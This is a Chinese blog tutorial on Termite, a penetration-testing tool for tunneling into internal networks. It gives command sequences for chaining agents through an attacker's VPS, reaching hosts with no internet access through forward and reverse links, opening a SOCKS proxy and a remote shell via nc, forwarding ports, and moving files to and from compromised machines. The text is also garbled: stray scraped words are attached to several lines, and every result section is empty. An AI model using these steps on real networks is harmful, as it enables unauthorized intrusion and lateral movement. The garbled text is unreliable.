【代理篇】内网穿透利器——Termite

时间 2020-06-07

标签代理篇穿透利器 termite 繁體版

原文原文链接

0x01 概述

一、工具介绍

Termite是一款内网穿透利器，分为管理端admin和代理端agent。它支持多平台、跳板机间正反向级联、内置shell管理等。shell

Admin功能参数工具

Agent功能参数spa

Admin链接agent后的功能参数3d

另附官方使用说明：http://rootkiter.com/Termite/README.txt代理

0x02 不一样场景中的使用

一、目标在公网

使用：code

（1）目标A：agent_win32.exe -l 8888

（2）PC：admin_win32.exe -c 目标ip -p 8888

效果：blog

二、目标在内网（能出网）

使用：vps

（1）在vps运行：agent_win32.exe -l 8888

（2）在本身机器运行：admin_win32.exe -c vps_ip -p 8888

（3）在目标机器运行：agent_win32.exe -c vps_ip -p 8888

效果：ip

三、目标B在内网（不出网，通出网机器A）

（1）agent间正向链接get

使用：

a.在vps运行：agent_win32.exe -l 8888

b.在PC运行：admin_win32.exe -c vps_ip -p 8888

c.在出网机器A运行：agent_win32.exe -c vps_ip -p 8888

d.在目标B运行：agent_win32.exe -l 9000

e.在PC运行：goto A_id → connect B_ip 9000

效果：

（2）agent间反向链接

说明：

a.在vps运行：agent_win32.exe -l 8888

b.在PC运行：admin_win32.exe -c vps_ip -p 8888

c.在出网机器A运行：agent_win32.exe -c vps_ip -p 8888

d.在PC运行：goto A_id -> listen 9000

e.在目标B运行：agent_win32.exe -c A_ip -p 9000

效果：

0x03 经常使用功能

一、socks代理

使用：

（1）goto 对应id
（2）socks 1080

效果：

二、shell管理

使用：

（1）shell 4444
（2）nc -v 127.0.0.1 4444

效果：

三、端口转发

使用：

lcxtran 本地端口 目标ip 目标端口

效果：

四、上传下载文件

使用：

upfile 本地文件路径 目标路径

downfile 目标文件路径 本地存放路径

效果：